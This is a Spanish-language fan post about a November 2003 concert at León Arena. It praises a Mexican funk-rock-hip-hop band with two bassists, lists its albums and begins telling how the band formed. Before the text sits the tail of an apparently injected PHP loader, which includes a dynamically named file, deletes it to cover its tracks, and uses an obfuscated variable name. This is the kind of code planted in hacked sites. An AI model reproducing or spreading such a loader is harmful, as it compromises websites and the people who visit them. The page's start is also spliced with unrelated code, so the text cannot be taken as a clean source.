");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?>
7 de Noviembre de 2003 a las 22:00 en León Arena
No, NUNCA me podría perder una banda que lleva DOS bajistas DOS, NUNCA me perdería a una banda que cantan en Espanglish, NUNCA me perdería una banda que practican un Funky-Rock-Hip-Hop-Core de ese calibre.
Por varias razones, porque me gustaron desde su primer disco, el censuradísimo (por la portada, una tontería) "Donde jugarán las niñas", porqué he botado como un descerebrado, alguna noche etílica, el "puto" y el "voto latino". Porque me conquistaron otra vez con su segundo disco "Apocalipshit" con ese giro hacia sonidos mucho más radicales y oscuros, y porque con el tercer trabajo: "Dance and Dense Denso" me han vuelto a conquistar (wow! 3 de 3 es mucho para un solo grupo!).
Así se gestó el invento:
Era el verano del 95 cuando Mickey y "X", ambos bajistas, se reunieron a palomear e intercambiar ideas y tips, pero resultaba un poco aburrido tocar solamente entre dos personas. Fue así como decidieron buscar a un baterista, debido a que consideraban que no estaba pasando nada en el rock mexicano.
Buscaron a alguien que empleara loops de baterías, dispara sampleos y secuencias y tuviera ganas de experimentar un poco. Fue así como se integró el segundo gen al que llamaremos "Y".
El sonido de la base rítmica tenía tendencias groovies y como ninguno de los 3 cantaba bien y Mickey rapeaba, en anteriores proyectos dio como resultado un sonido rapero hip hopero.
El esperma estaba listo y había que fecundar al óvulo ideal, entonces aparece Tito, quien ya había participado anteriormente con Mickey y le gustaba experimentar con diversos sonidos de guitarra y tenía una gran influencia de ritmos afroamericanos.